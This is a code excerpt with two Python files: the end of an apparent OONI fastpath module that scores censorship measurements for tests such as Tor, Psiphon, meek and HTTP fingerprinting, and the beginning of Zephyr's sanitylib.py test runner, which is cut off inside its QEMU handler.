# TODO: this is just a stub - add NDT scoring where possible
return {}
@metrics.timer("score_tcp_connect")
def score_tcp_connect(msm) -> dict:
"""Calculate measurement scoring for tcp connect
Returns a scores dict
"""
# https://github.com/ooni/spec/blob/master/nettests/ts-008-tcp-connect.md
# NOTE: this is *NOT* spec/blob/master/data-formats/df-005-tcpconnect.md
# TODO: review scores
scores = {f"blocking_{l}": 0.0 for l in LOCALITY_VALS}
tk = msm["test_keys"]
assert msm["input"]
conn_result = tk.get("connection", None)
if conn_result == "success":
return scores
if conn_result == "generic_timeout_error":
scores["blocking_general"] = 0.8
return scores
if conn_result == "connection_refused_error":
scores["blocking_general"] = 0.8
return scores
if conn_result == "connect_error":
scores["blocking_general"] = 0.8
return scores
if conn_result == "tcp_timed_out_error":
scores["blocking_general"] = 0.8
return scores
# TODO: add missing error type
scores["blocking_general"] = 1.0
return scores
def score_dash(msm) -> dict:
"""Calculate measurement scoring for DASH
(Dynamic Adaptive Streaming over HTTP)
Returns a scores dict
"""
# TODO: review scores
# TODO: any blocking scoring based on performance?
scores = {f"blocking_{l}": 0.0 for l in LOCALITY_VALS} # type: Dict[str, Any]
failure = msm["test_keys"].get("failure", None)
if failure == None:
pass
elif failure == "connection_aborted":
scores["blocking_general"] = 0.1
scores["accuracy"] = 0.0
elif failure == "json_parse_error":
scores["blocking_general"] = 0.1
scores["accuracy"] = 0.0
elif failure == "eof_error":
scores["blocking_general"] = 0.1
scores["accuracy"] = 0.0
elif failure == "json_processing_error":
scores["blocking_general"] = 0.1
scores["accuracy"] = 0.0
elif failure == "http_request_failed":
scores["blocking_general"] = 0.1
scores["accuracy"] = 0.0
elif failure == "connect_error":
scores["blocking_general"] = 0.1
scores["accuracy"] = 0.0
elif failure == "generic_timeout_error":
scores["blocking_general"] = 0.1
scores["accuracy"] = 0.0
elif failure == "broken_pipe":
scores["blocking_general"] = 0.1
scores["accuracy"] = 0.0
elif failure == "connection_refused":
scores["blocking_general"] = 0.1
scores["accuracy"] = 0.0
elif "ssl_error" in failure:
scores["blocking_general"] = 0.1
scores["accuracy"] = 0.0
else:
scores["msg"] = "Probe error"
scores["accuracy"] = 0.0
return scores
def score_meek_fronted_requests_test(msm) -> dict:
"""Calculate measurement scoring for Meek
Returns a scores dict
"""
scores = {f"blocking_{l}": 0.0 for l in LOCALITY_VALS}
tk = msm["test_keys"]
requests = tk.get("requests", ()) or ()
if len(requests) == 0:
# requests is empty: usually "success" is missing.
scores["blocking_general"] = 1.0
scores["accuracy"] = 0
return scores
success = tk.get("success", None)
for r in requests:
resp = r.get("response", {})
if resp is None:
# Error during probing?
scores["blocking_general"] = 1.0
if success != None:
log.info("Client bug: success != None")
return scores
if resp.get("code", 0) != 200:
# A failed response is enough
scores["blocking_general"] = 1.0
if success != False:
log.info("Client bug: success != False")
return scores
server = resp.get("headers", {}).get("Server", "")
if not server.startswith("ECAcc "):
scores["blocking_general"] += 0.5
return scores
def score_psiphon(msm) -> dict:
"""Calculate measurement scoring for Psiphon
Returns a scores dict
"""
scores = {f"blocking_{l}": 0.0 for l in LOCALITY_VALS}
tk = msm.get("test_keys", {})
# https://github.com/ooni/spec/blob/master/nettests/ts-015-psiphon.md
failure = tk.get("failure", None)
bootstrap_time = tk.get("bootstrap_time", 0)
if failure is None:
if bootstrap_time == 0:
# should not happen
logbug(4, "invalid psiphon msmt", msm)
scores["accuracy"] = 0.0
else:
# success
scores["accuracy"] = 1.0
else:
# if bootstrap_time == 0: # there was an error bootstrapping Psiphon
# else: # there was an error when using Psiphon
scores["accuracy"] = 1.0
scores["blocking_general"] = 1.0
if "resolver_ip" not in msm:
logbug(0, "no resolver_ip", msm)
scores["accuracy"] = 0.0
return scores
def score_tor(msm) -> dict:
"""Calculate measurement scoring for Tor (test_name: tor)
https://github.com/ooni/spec/blob/master/nettests/ts-023-tor.md
Returns a scores dict
"""
scores = {f"blocking_{l}": 0.0 for l in LOCALITY_VALS}
tk = msm.get("test_keys", {})
# targets -> <ipaddr:port>|<sha obfs4 fprint> -> failure
# -> network_events
targets = tk.get("targets", {})
if not targets:
logbug(5, "missing Tor targets", msm)
scores["accuracy"] = 0.0
return scores
blocked_cnt = 0
not_run_cnt = 0
success_cnt = 0
for d in targets.values():
if "failure" not in d or "network_events" not in d:
logbug(6, "missing Tor failure or network_events field", msm)
scores["accuracy"] = 0.0
return scores
f = d["failure"]
# False: did not run: N/A
# None: success
# string: failed
if f is False:
not_run_cnt += 1
elif f == None:
success_cnt += 1
elif f == "":
# logbug(8
assert 0, d
else:
blocked_cnt += 1
if blocked_cnt + success_cnt:
scores["blocking_general"] = blocked_cnt / (blocked_cnt + success_cnt)
else:
scores["accuracy"] = 0.0
return scores
def score_http_requests(msm) -> dict:
"""Calculates measurement scoring for legacy test http_requests
Returns a scores dict
"""
scores = {f"blocking_{l}": 0.0 for l in LOCALITY_VALS}
tk = msm.get("test_keys", {})
body_length_match = tk.get("body_length_match", None)
headers_match = tk.get("headers_match", None)
rid = msm.get("report_id", None)
inp = msm.get("input", None)
failed = msm.get("control_failure", None) or msm.get("experiment_failure", None)
if failed or body_length_match is None or headers_match is None:
scores["accuracy"] = 0.0
log.debug(f"Incorrect measurement t1 {rid} {inp}")
return scores
reachable = bool(body_length_match) and bool(headers_match)
if not reachable:
scores["blocking_general"] = 1.0
zzfps = fingerprints["ZZ"]
msm_cc = msm.get("probe_cc", None)
ccfps = fingerprints.get(msm_cc, {})
# Scan for fingerprint matches in the HTTP body and the HTTP headers
# One request is from the probe and one is over Tor. If the latter
# is blocked the msmt is failed.
tk = msm.get("test_keys", {})
for r in tk.get("requests", []):
is_tor = r.get("request", {}).get("tor", {}).get("is_tor", None)
body = r.get("response", {}).get("body", None)
if is_tor is None or body is None:
scores["accuracy"] = 0.0
log.debug(f"Incorrect measurement t2 {rid} {inp}")
return scores
if isinstance(body, dict):
# TODO: is this needed?
if "data" in body and body.get("format", "") == "base64":
log.debug("Decoding base64 body")
body = b64decode(body["data"])
else:
logbug(2, "incorrect body of type dict", measurement)
body = None
for fp in zzfps["body_match"] + ccfps.get("body_match", []):
bm = fp["body_match"]
if isinstance(body, bytes):
idx = body.find(bm.encode())
else:
idx = body.find(bm)
if idx != -1:
if is_tor:
scores["accuracy"] = 0.0
log.debug(f"Failed measurement t1 {rid} {inp}")
return scores
scores["confirmed"] = True
log.debug("matched body fp %s %r at pos %d", msm_cc, bm, idx)
# Match HTTP headers if found
headers = r.get("headers", {})
headers = {h.lower(): v for h, v in headers.items()}
for fp in zzfps["header_full"] + ccfps.get("header_full", []):
name = fp["header_name"]
if name in headers and headers[name] == fp["header_full"]:
if is_tor:
scores["accuracy"] = 0.0
log.debug(f"Failed measurement t2 {rid} {inp}")
return scores
scores["confirmed"] = True
log.debug("matched header full fp %s %r", msm_cc, fp["header_full"])
for fp in zzfps["header_prefix"] + ccfps.get("header_prefix", []):
name = fp["header_name"]
prefix = fp["header_prefix"]
if name in headers and headers[name].startswith(prefix):
if is_tor:
scores["accuracy"] = 0.0
log.debug(f"Failed measurement {rid} {inp}")
return scores
scores["confirmed"] = True
log.debug("matched header prefix %s %r", msm_cc, prefix)
return scores
def score_dns_consistency(msm) -> dict:
"""Calculates measurement scoring for legacy test dns_consistency
Returns a scores dict
"""
# TODO: implement scoring
scores = {f"blocking_{l}": 0.0 for l in LOCALITY_VALS}
return scores
@metrics.timer("score_measurement")
def score_measurement(msm: dict) -> dict:
"""Calculates measurement scoring. Returns a scores dict"""
# Blocking locality: global > country > ISP > local
# unclassified locality is stored in "blocking_general"
tn = msm["test_name"]
try:
if tn == "telegram":
return score_measurement_telegram(msm)
if tn == "facebook_messenger":
return score_measurement_facebook_messenger(msm)
if tn == "http_header_field_manipulation":
return score_measurement_hhfm(msm)
if tn == "http_invalid_request_line":
return score_http_invalid_request_line(msm)
if tn == "whatsapp":
return score_measurement_whatsapp(msm)
if tn == "vanilla_tor":
return score_vanilla_tor(msm)
if tn == "web_connectivity":
matches = match_fingerprints(msm)
return score_web_connectivity(msm, matches)
if tn == "ndt":
return score_ndt(msm)
if tn == "tcp_connect":
return score_tcp_connect(msm)
if tn == "dash":
return score_dash(msm)
if tn == "meek_fronted_requests_test":
return score_meek_fronted_requests_test(msm)
if tn == "psiphon":
return score_psiphon(msm)
if tn == "tor":
return score_tor(msm)
if tn == "http_requests":
return score_http_requests(msm)
if tn == "dns_consistency":
return score_dns_consistency(msm)
log.debug("Unsupported test name %s", tn)
scores = {f"blocking_{l}": 0.0 for l in LOCALITY_VALS}
scores["accuracy"] = 0.0
return scores
except AssertionError as e:
# unknown / new client bugs are often catched by assertions
if str(e).startswith("pbug "): # suspected probe bug
logbug(0, str(e)[4:], msm)
scores = {f"blocking_{l}": 0.0 for l in LOCALITY_VALS}
scores["accuracy"] = 0.0
return scores
raise
@metrics.timer("trivial_id")
def trivial_id(msm: dict) -> str:
"""Generate a trivial id of the measurement to allow upsert if needed
This is used for legacy (before measurement_uid) measurements
- 32-bytes hexdigest
- Deterministic / stateless with no DB interaction
- Malicious/bugged msmts with collisions on report_id/input/test_name lead
to different hash values avoiding the collision
- Malicious/duplicated msmts that are semantically identical to the "real"
one lead to harmless collisions
"""
# NOTE: we want the id to stay the same when a msmt is fetched from SSH
# and from a can on ooni-data-private/canned
# Implementing a rolling hash without ujson.dumps is 2x faster
# A rolling hash on only the first 2 levels of the dict is 10x faster
#
# Same output with Python's json
VER = "00"
msm_jstr = ujson.dumps(msm, sort_keys=True, ensure_ascii=False).encode()
tid = VER + hashlib.shake_128(msm_jstr).hexdigest(15)
return tid
def unwrap_msmt(post):
fmt = post["format"].lower()
if fmt == "json":
return post["content"]
if fmt == "yaml":
return yaml.safe_load(msmt)
def msm_processor(queue):
"""Measurement processor worker"""
if conf.no_write_to_db:
log.info("Skipping DB connection setup")
else:
db.setup(conf)
while True:
msm_tup = queue.get()
if msm_tup is None:
log.info("Worker with PID %d exiting", os.getpid())
return
with metrics.timer("full_run"):
try:
msm_jstr, measurement, msmt_uid = msm_tup
if measurement is None:
measurement = ujson.loads(msm_jstr)
if sorted(measurement.keys()) == ["content", "format"]:
measurement = unwrap_msmt(measurement)
rid = measurement.get("report_id", None)
inp = measurement.get("input", None)
log.debug(f"Processing {msmt_uid} {rid} {inp}")
if measurement.get("probe_cc", "").upper() == "ZZ":
log.debug(f"Ignoring measurement with probe_cc=ZZ")
metrics.incr("discarded_measurement")
continue
if measurement.get("probe_asn", "").upper() == "AS0":
log.debug(f"Ignoring measurement with ASN 0")
metrics.incr("discarded_measurement")
continue
scores = score_measurement(measurement)
# Generate anomaly, confirmed and failure to keep consistency
# with the legacy pipeline, allowing simple queries in the API
# and in manual analysis; also keep compatibility with Explorer
anomaly = scores.get("blocking_general", 0.0) > 0.5
failure = scores.get("accuracy", 1.0) < 0.5
confirmed = scores.get("confirmed", False)
if anomaly or failure or confirmed:
log.debug(
f"Storing {msmt_uid} {rid} {inp} A{int(anomaly)} F{int(failure)} C{int(confirmed)}"
)
sw_name = measurement.get("software_name", "unknown")
sw_version = measurement.get("software_version", "unknown")
platform = "unset"
if "annotations" in measurement and isinstance(
measurement["annotations"], dict
):
platform = measurement["annotations"].get("platform", "unset")
if msmt_uid is None:
msmt_uid = trivial_id(measurement) # legacy measurement
if conf.no_write_to_db:
continue
db.upsert_summary(
measurement,
scores,
anomaly,
confirmed,
failure,
msmt_uid,
sw_name,
sw_version,
platform,
conf.update,
)
except Exception as e:
log.exception(e)
metrics.incr("unhandled_exception")
def shut_down(queue):
log.info("Shutting down workers")
[queue.put(None) for n in range(NUM_WORKERS)]
# FIXME
# queue.close()
# queue.join_thread()
def core():
# There are 3 main data sources, in order of age:
# - cans on S3
# - older report files on collectors (max 1 day of age)
# - report files on collectors fetched in "real-time"
# Load json/yaml files and apply filters like canning
t00 = time.time()
# Spawn worker processes
# 'queue' is a singleton from the portable_queue module
workers = [
mp.Process(target=msm_processor, args=(queue,)) for n in range(NUM_WORKERS)
]
try:
[t.start() for t in workers]
if conf.noapi:
# Pull measurements from S3
process_measurements_from_s3(queue)
else:
# Start HTTP API
log.info("Starting HTTP API")
start_http_api(queue)
except Exception as e:
log.exception(e)
finally:
log.info("Shutting down workers")
time.sleep(1)
shut_down(queue)
time.sleep(1)
log.info("Join")
[w.join() for w in workers]
log.info("Join done")
clean_caches()
def setup_fingerprints():
"""Setup fingerprints lookup dictionary
"ZZ" applies a fingerprint globally
"""
# pre-process fingerprints to speed up lookup
global fingerprints
# cc -> fprint_type -> list of dicts
fingerprints = {"ZZ": {"body_match": [], "header_prefix": [], "header_full": []}}
for cc, fprints in fastpath.utils.fingerprints.items():
d = fingerprints.setdefault(cc, {})
for fp in fprints:
assert fp["locality"] in LOCALITY_VALS, fp["locality"]
if "body_match" in fp:
d.setdefault("body_match", []).append(fp)
elif "header_prefix" in fp:
fp["header_name"] = fp["header_name"].lower()
d.setdefault("header_prefix", []).append(fp)
elif "header_full" in fp:
fp["header_name"] = fp["header_name"].lower()
d.setdefault("header_full", []).append(fp)
def main():
setup()
setup_fingerprints()
log.info("Starting")
core()
if __name__ == "__main__":
main()
|
sanitylib.py
|
#!/usr/bin/env python3
# vim: set syntax=python ts=4 :
#
# Copyright (c) 2018 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os
import contextlib
import string
import mmap
import sys
import re
import subprocess
import select
import shutil
import shlex
import signal
import threading
import concurrent.futures
from collections import OrderedDict
from threading import BoundedSemaphore
import queue
import time
import csv
import glob
import concurrent
import xml.etree.ElementTree as ET
import logging
from pathlib import Path
from distutils.spawn import find_executable
from colorama import Fore
import yaml
import platform
try:
import serial
except ImportError:
print("Install pyserial python module with pip to use --device-testing option.")
try:
from tabulate import tabulate
except ImportError:
print("Install tabulate python module with pip to use --device-testing option.")
try:
import psutil
except ImportError:
print("Install psutil python module with pip to run in Qemu.")
ZEPHYR_BASE = os.getenv("ZEPHYR_BASE")
if not ZEPHYR_BASE:
sys.exit("$ZEPHYR_BASE environment variable undefined")
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts", "dts"))
import edtlib
hw_map_local = threading.Lock()
report_lock = threading.Lock()
# Use this for internal comparisons; that's what canonicalization is
# for. Don't use it when invoking other components of the build system
# to avoid confusing and hard to trace inconsistencies in error messages
# and logs, generated Makefiles, etc. compared to when users invoke these
# components directly.
# Note "normalization" is different from canonicalization, see os.path.
canonical_zephyr_base = os.path.realpath(ZEPHYR_BASE)
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/"))
from sanity_chk import scl
from sanity_chk import expr_parser
logger = logging.getLogger('sanitycheck')
logger.setLevel(logging.DEBUG)
pipeline = queue.LifoQueue()
class CMakeCacheEntry:
'''Represents a CMake cache entry.
This class understands the type system in a CMakeCache.txt, and
converts the following cache types to Python types:
Cache Type Python type
---------- -------------------------------------------
FILEPATH str
PATH str
STRING str OR list of str (if ';' is in the value)
BOOL bool
INTERNAL str OR list of str (if ';' is in the value)
---------- -------------------------------------------
'''
# Regular expression for a cache entry.
#
# CMake variable names can include escape characters, allowing a
# wider set of names than is easy to match with a regular
# expression. To be permissive here, use a non-greedy match up to
# the first colon (':'). This breaks if the variable name has a
# colon inside, but it's good enough.
CACHE_ENTRY = re.compile(
r'''(?P<name>.*?) # name
:(?P<type>FILEPATH|PATH|STRING|BOOL|INTERNAL) # type
=(?P<value>.*) # value
''', re.X)
@classmethod
def _to_bool(cls, val):
# Convert a CMake BOOL string into a Python bool.
#
# "True if the constant is 1, ON, YES, TRUE, Y, or a
# non-zero number. False if the constant is 0, OFF, NO,
# FALSE, N, IGNORE, NOTFOUND, the empty string, or ends in
# the suffix -NOTFOUND. Named boolean constants are
# case-insensitive. If the argument is not one of these
# constants, it is treated as a variable."
#
# https://cmake.org/cmake/help/v3.0/command/if.html
val = val.upper()
if val in ('ON', 'YES', 'TRUE', 'Y'):
return 1
elif val in ('OFF', 'NO', 'FALSE', 'N', 'IGNORE', 'NOTFOUND', ''):
return 0
elif val.endswith('-NOTFOUND'):
return 0
else:
try:
v = int(val)
return v != 0
except ValueError as exc:
raise ValueError('invalid bool {}'.format(val)) from exc
@classmethod
def from_line(cls, line, line_no):
# Comments can only occur at the beginning of a line.
# (The value of an entry could contain a comment character).
if line.startswith('//') or line.startswith('#'):
return None
# Whitespace-only lines do not contain cache entries.
if not line.strip():
return None
m = cls.CACHE_ENTRY.match(line)
if not m:
return None
name, type_, value = (m.group(g) for g in ('name', 'type', 'value'))
if type_ == 'BOOL':
try:
value = cls._to_bool(value)
except ValueError as exc:
args = exc.args + ('on line {}: {}'.format(line_no, line),)
raise ValueError(args) from exc
elif type_ in ['STRING', 'INTERNAL']:
# If the value is a CMake list (i.e. is a string which
# contains a ';'), convert to a Python list.
if ';' in value:
value = value.split(';')
return CMakeCacheEntry(name, value)
def __init__(self, name, value):
self.name = name
self.value = value
def __str__(self):
fmt = 'CMakeCacheEntry(name={}, value={})'
return fmt.format(self.name, self.value)
class CMakeCache:
'''Parses and represents a CMake cache file.'''
@staticmethod
def from_file(cache_file):
return CMakeCache(cache_file)
def __init__(self, cache_file):
self.cache_file = cache_file
self.load(cache_file)
def load(self, cache_file):
entries = []
with open(cache_file, 'r') as cache:
for line_no, line in enumerate(cache):
entry = CMakeCacheEntry.from_line(line, line_no)
if entry:
entries.append(entry)
self._entries = OrderedDict((e.name, e) for e in entries)
def get(self, name, default=None):
entry = self._entries.get(name)
if entry is not None:
return entry.value
else:
return default
def get_list(self, name, default=None):
if default is None:
default = []
entry = self._entries.get(name)
if entry is not None:
value = entry.value
if isinstance(value, list):
return value
elif isinstance(value, str):
return [value] if value else []
else:
msg = 'invalid value {} type {}'
raise RuntimeError(msg.format(value, type(value)))
else:
return default
def __contains__(self, name):
return name in self._entries
def __getitem__(self, name):
return self._entries[name].value
def __setitem__(self, name, entry):
if not isinstance(entry, CMakeCacheEntry):
msg = 'improper type {} for value {}, expecting CMakeCacheEntry'
raise TypeError(msg.format(type(entry), entry))
self._entries[name] = entry
def __delitem__(self, name):
del self._entries[name]
def __iter__(self):
return iter(self._entries.values())
class SanityCheckException(Exception):
pass
class SanityRuntimeError(SanityCheckException):
pass
class ConfigurationError(SanityCheckException):
def __init__(self, cfile, message):
SanityCheckException.__init__(self, cfile + ": " + message)
class BuildError(SanityCheckException):
pass
class ExecutionError(SanityCheckException):
pass
class HarnessImporter:
def __init__(self, name):
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/sanity_chk"))
module = __import__("harness")
if name:
my_class = getattr(module, name)
else:
my_class = getattr(module, "Test")
self.instance = my_class()
class Handler:
def __init__(self, instance, type_str="build"):
"""Constructor
"""
self.lock = threading.Lock()
self.state = "waiting"
self.run = False
self.duration = 0
self.type_str = type_str
self.binary = None
self.pid_fn = None
self.call_make_run = False
self.name = instance.name
self.instance = instance
self.timeout = instance.testcase.timeout
self.sourcedir = instance.testcase.source_dir
self.build_dir = instance.build_dir
self.log = os.path.join(self.build_dir, "handler.log")
self.returncode = 0
self.set_state("running", self.duration)
self.generator = None
self.generator_cmd = None
self.args = []
def set_state(self, state, duration):
self.lock.acquire()
self.state = state
self.duration = duration
self.lock.release()
def get_state(self):
self.lock.acquire()
ret = (self.state, self.duration)
self.lock.release()
return ret
def record(self, harness):
if harness.recording:
filename = os.path.join(self.build_dir, "recording.csv")
with open(filename, "at") as csvfile:
cw = csv.writer(csvfile, harness.fieldnames, lineterminator=os.linesep)
cw.writerow(harness.fieldnames)
for instance in harness.recording:
cw.writerow(instance)
class BinaryHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.terminated = False
# Tool options
self.valgrind = False
self.lsan = False
self.asan = False
self.coverage = False
def try_kill_process_by_pid(self):
if self.pid_fn:
pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
self.pid_fn = None # clear so we don't try to kill the binary twice
try:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
pass
def terminate(self, proc):
# encapsulate terminate functionality so we do it consistently where ever
# we might want to terminate the proc. We need try_kill_process_by_pid
# because of both how newer ninja (1.6.0 or greater) and .NET / renode
# work. Newer ninja's don't seem to pass SIGTERM down to the children
# so we need to use try_kill_process_by_pid.
self.try_kill_process_by_pid()
proc.terminate()
# sleep for a while before attempting to kill
time.sleep(0.5)
proc.kill()
self.terminated = True
def _output_reader(self, proc, harness):
log_out_fp = open(self.log, "wt")
for line in iter(proc.stdout.readline, b''):
logger.debug("OUTPUT: {0}".format(line.decode('utf-8').rstrip()))
log_out_fp.write(line.decode('utf-8'))
log_out_fp.flush()
harness.handle(line.decode('utf-8').rstrip())
if harness.state:
try:
# POSIX arch based ztests end on their own,
# so let's give it up to 100ms to do so
proc.wait(0.1)
except subprocess.TimeoutExpired:
self.terminate(proc)
break
log_out_fp.close()
def handle(self):
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
if self.call_make_run:
command = [self.generator_cmd, "run"]
else:
command = [self.binary]
run_valgrind = False
if self.valgrind and shutil.which("valgrind"):
command = ["valgrind", "--error-exitcode=2",
"--leak-check=full",
"--suppressions=" + ZEPHYR_BASE + "/scripts/valgrind.supp",
"--log-file=" + self.build_dir + "/valgrind.log"
] + command
run_valgrind = True
logger.debug("Spawning process: " +
" ".join(shlex.quote(word) for word in command) + os.linesep +
"in directory: " + self.build_dir)
start_time = time.time()
env = os.environ.copy()
if self.asan:
env["ASAN_OPTIONS"] = "log_path=stdout:" + \
env.get("ASAN_OPTIONS", "")
if not self.lsan:
env["ASAN_OPTIONS"] += "detect_leaks=0"
with subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=self.build_dir, env=env) as proc:
logger.debug("Spawning BinaryHandler Thread for %s" % self.name)
t = threading.Thread(target=self._output_reader, args=(proc, harness,), daemon=True)
t.start()
t.join(self.timeout)
if t.is_alive():
self.terminate(proc)
t.join()
proc.wait()
self.returncode = proc.returncode
handler_time = time.time() - start_time
if self.coverage:
subprocess.call(["GCOV_PREFIX=" + self.build_dir,
"gcov", self.sourcedir, "-b", "-s", self.build_dir], shell=True)
self.try_kill_process_by_pid()
# FIXME: This is needed when killing the simulator, the console is
# garbled and needs to be reset. Did not find a better way to do that.
subprocess.call(["stty", "sane"])
self.instance.results = harness.tests
if not self.terminated and self.returncode != 0:
# When a process is killed, the default handler returns 128 + SIGTERM
# so in that case the return code itself is not meaningful
self.set_state("failed", handler_time)
self.instance.reason = "Failed"
elif run_valgrind and self.returncode == 2:
self.set_state("failed", handler_time)
self.instance.reason = "Valgrind error"
elif harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state("timeout", handler_time)
self.instance.reason = "Timeout"
self.record(harness)
class DeviceHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.suite = None
def monitor_serial(self, ser, halt_fileno, harness):
log_out_fp = open(self.log, "wt")
ser_fileno = ser.fileno()
readlist = [halt_fileno, ser_fileno]
while ser.isOpen():
readable, _, _ = select.select(readlist, [], [], self.timeout)
if halt_fileno in readable:
logger.debug('halted')
ser.close()
break
if ser_fileno not in readable:
continue # Timeout.
serial_line = None
try:
serial_line = ser.readline()
except TypeError:
pass
except serial.SerialException:
ser.close()
break
# Just because ser_fileno has data doesn't mean an entire line
# is available yet.
if serial_line:
sl = serial_line.decode('utf-8', 'ignore').lstrip()
logger.debug("DEVICE: {0}".format(sl.rstrip()))
log_out_fp.write(sl)
log_out_fp.flush()
harness.handle(sl.rstrip())
if harness.state:
ser.close()
break
log_out_fp.close()
def device_is_available(self, instance):
device = instance.platform.name
fixture = instance.testcase.harness_config.get("fixture")
for i in self.suite.connected_hardware:
if fixture and fixture not in i.get('fixtures', []):
continue
if i['platform'] == device and i['available'] and i['serial']:
return True
return False
def get_available_device(self, instance):
device = instance.platform.name
for i in self.suite.connected_hardware:
if i['platform'] == device and i['available'] and i['serial']:
i['available'] = False
i['counter'] += 1
return i
return None
def make_device_available(self, serial):
with hw_map_local:
for i in self.suite.connected_hardware:
if i['serial'] == serial:
i['available'] = True
@staticmethod
def run_custom_script(script, timeout):
with subprocess.Popen(script, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
stdout, _ = proc.communicate(timeout=timeout)
logger.debug(stdout.decode())
except subprocess.TimeoutExpired:
proc.kill()
proc.communicate()
logger.error("{} timed out".format(script))
def handle(self):
out_state = "failed"
if self.suite.west_flash:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
if self.suite.west_runner:
command.append("--runner")
command.append(self.suite.west_runner)
# There are three ways this option is used.
# 1) bare: --west-flash
# This results in options.west_flash == []
# 2) with a value: --west-flash="--board-id=42"
# This results in options.west_flash == "--board-id=42"
# 3) Multiple values: --west-flash="--board-id=42,--erase"
# This results in options.west_flash == "--board-id=42 --erase"
if self.suite.west_flash != []:
command.append('--')
command.extend(self.suite.west_flash.split(','))
else:
command = [self.generator_cmd, "-C", self.build_dir, "flash"]
while not self.device_is_available(self.instance):
logger.debug("Waiting for device {} to become available".format(self.instance.platform.name))
time.sleep(1)
hardware = self.get_available_device(self.instance)
if hardware:
runner = hardware.get('runner', None)
if runner:
board_id = hardware.get("probe_id", hardware.get("id", None))
product = hardware.get("product", None)
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
command.append("--runner")
command.append(hardware.get('runner', None))
if runner == "pyocd":
command.append("--board-id")
command.append(board_id)
elif runner == "nrfjprog":
command.append('--')
command.append("--snr")
command.append(board_id)
elif runner == "openocd" and product == "STM32 STLink":
command.append('--')
command.append("--cmd-pre-init")
command.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "EDBG CMSIS-DAP":
command.append('--')
command.append("--cmd-pre-init")
command.append("cmsis_dap_serial %s" % (board_id))
elif runner == "jlink":
command.append("--tool-opt=-SelectEmuBySN %s" % (board_id))
serial_device = hardware['serial']
try:
ser = serial.Serial(
serial_device,
baudrate=115200,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=self.timeout
)
except serial.SerialException as e:
self.set_state("failed", 0)
self.instance.reason = "Failed"
logger.error("Serial device error: %s" % (str(e)))
self.make_device_available(serial_device)
return
ser.flush()
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
read_pipe, write_pipe = os.pipe()
start_time = time.time()
pre_script = hardware.get('pre_script')
post_flash_script = hardware.get('post_flash_script')
post_script = hardware.get('post_script')
if pre_script:
self.run_custom_script(pre_script, 30)
t = threading.Thread(target=self.monitor_serial, daemon=True,
args=(ser, read_pipe, harness))
t.start()
d_log = "{}/device.log".format(self.instance.build_dir)
logger.debug('Flash command: %s', command)
try:
stdout = stderr = None
with subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
(stdout, stderr) = proc.communicate(timeout=30)
logger.debug(stdout.decode())
if proc.returncode != 0:
self.instance.reason = "Device issue (Flash?)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.TimeoutExpired:
proc.kill()
(stdout, stderr) = proc.communicate()
self.instance.reason = "Device issue (Timeout)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.CalledProcessError:
os.write(write_pipe, b'x') # halt the thread
if post_flash_script:
self.run_custom_script(post_flash_script, 30)
t.join(self.timeout)
if t.is_alive():
logger.debug("Timed out while monitoring serial output on {}".format(self.instance.platform.name))
out_state = "timeout"
if ser.isOpen():
ser.close()
os.close(write_pipe)
os.close(read_pipe)
handler_time = time.time() - start_time
if out_state == "timeout":
for c in self.instance.testcase.cases:
if c not in harness.tests:
harness.tests[c] = "BLOCK"
self.instance.reason = "Timeout"
self.instance.results = harness.tests
if harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state(out_state, handler_time)
if post_script:
self.run_custom_script(post_script, 30)
self.make_device_available(serial_device)
self.record(harness)
class QEMUHandler(Handler):
"""Spawns a thread to monitor QEMU output from pipes
We pass QEMU_PIPE to 'make run' and monitor the pipes for output.
We need to do this as once qemu starts, it runs forever until killed.
Test cases emit special messages to the console as they run, we check
for these to collect whether the test passed or failed.
"""
def __init__(self, instance, type_str):
"""Constructor
@param instance Test instance
"""
super().__init__(instance, type_str)
self.fifo_fn = os.path.join(instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(instance.build_dir, "qemu.pid")
@staticmethod
def _get_cpu_time(pid):
"""get process CPU time.
The guest virtual time in QEMU icount mode isn't host time and
it's maintained by counting guest instructions, so we use QEMU
process exection time to mostly simulate the time of guest OS.
"""
proc = psutil.Process(pid)
cpu_time = proc.cpu_times()
return cpu_time.user + cpu_time.system
@staticmethod
def _thread(handler, timeout, outdir, logfile, fifo_fn, pid_fn, results, harness):
fifo_in = fifo_fn + ".in"
fifo_out = fifo_fn + ".out"
# These in/out nodes are named from QEMU's perspective, not ours
if os.path.exists(fifo_in):
os.unlink(fifo_in)
os.mkfifo(fifo_in)
if os.path.exists(fifo_out):
os.unlink(fifo_out)
os.mkfifo(fifo_out)
# We don't do anything with out_fp but we need to open it for
# writing so that QEMU doesn't block, due to the way pipes work
out_fp = open(fifo_in, "wb")
# Disable internal buffering, we don't
# want read() or poll() to ever block if there is data in there
in_fp = open(fifo_out, "rb", buffering=0)
log_out_fp = open(logfile, "wt")
start_time = time.time()
timeout_time = start_time + timeout
p = select.poll()
p.register(in_fp, select.POLLIN)
out_state = None
